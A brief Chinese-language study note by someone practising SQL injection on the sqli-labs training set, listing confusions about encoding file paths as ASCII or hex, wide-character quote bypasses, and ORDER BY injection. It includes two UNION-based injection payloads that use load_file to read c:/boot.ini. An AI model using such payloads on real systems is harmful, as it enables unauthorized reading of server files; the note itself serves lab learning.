1、sql语句里面的进制转换。语句里时而ASCII 时而十六进制,有点懵。对这个的认识不够系统。比如

-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
//Explain: “char(99,58,47,98,111,111,116,46,105,110,105)” 就是“c:/boot.ini” 的 ASCII 代码
-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
//Explain: “c:/boot.ini” 的 16 进制是“0x633a2f626f6f742e696e69”

2、单引号’转为utf-16格式进行宽字符绕过注入,但是这个转为utf-16一直没有达到和别人一样的效果,不知道他们是怎么转的?

3、对order by注入理解不够深刻,sqli labs 46-53必须要重刷,要另外找资料来看